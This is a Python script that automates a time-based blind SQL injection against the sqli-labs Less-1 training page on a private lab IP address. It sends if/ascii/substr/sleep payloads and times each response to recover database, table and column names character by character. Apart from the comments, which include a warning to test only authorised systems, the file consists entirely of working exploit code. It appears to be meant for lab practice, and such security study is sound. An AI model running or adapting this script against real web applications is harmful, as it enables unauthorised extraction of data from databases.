import requests
import time
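# Target URL: sqli-labs Less-1 (GET, single-quote string injection).
# NOTE(review): this script sends attack payloads — only run it against a lab
# or a system you are explicitly authorised to test.
url = 'http://192.168.8.152/sql/Less-1/?id=1'
# Query for the first database name (the payload below appends `limit 0,1`,
# so only the first row is ever extracted)
database = 'select schema_name from information_schema.schemata'
# Query for the table names of the current database
table = 'select table_name from information_schema.tables where table_schema=database()'
# Query for the column names of one table; "table_name" is a placeholder to fill in
column = 'select column_name from information_schema.columns where table_name="table_name"'
# Seconds the server is told to sleep() on a correct guess; a response that
# takes at least this long is treated as a hit. Network jitter close to this
# value produces false positives — raise it on a slow link.
DELAY = 2
# Accumulates the characters recovered so far
result = ''
# i is the 1-based character position; names rarely exceed 30 characters
for i in range(1, 30):
    # j is the ASCII code being guessed. '0'-'9' (48-57), 'A'-'Z' (65-90),
    # '_' (95) and 'a'-'z' (97-122) all lie in 48..122 inclusive, so the
    # upper bound must be 123 or 'z' can never be recovered.
    for j in range(48, 123):
        # Time-based blind payload. The leading quote closes the single-quoted
        # id='1' string of Less-1 (this is a string injection, not a numeric
        # one); `--+` decodes to `-- ` on the server and comments out the rest
        # of the original query.
        payload = "' and if(ascii(substr(({} limit 0,1),{},1))={},sleep({}),0)--+".format(
            database, i, j, DELAY)
        # perf_counter is a monotonic interval clock; time.time() can jump.
        start = time.perf_counter()
        # The timeout must stay well above DELAY, otherwise a correct guess
        # (which deliberately takes DELAY seconds) would be raised as a failure
        # instead of a hit. Without any timeout a dead target hangs the script.
        r = requests.get(url + payload, timeout=DELAY + 10)
        elapsed = time.perf_counter() - start
        if elapsed >= DELAY:
            result += chr(j)
            # Print progress so a partial result survives an interruption
            print(result)
            break
    else:
        # No candidate triggered the delay: substr() past the end returns ''
        # and ascii('') is 0, so the string has ended. Stop instead of sending
        # another ~75 requests for every remaining position.
        break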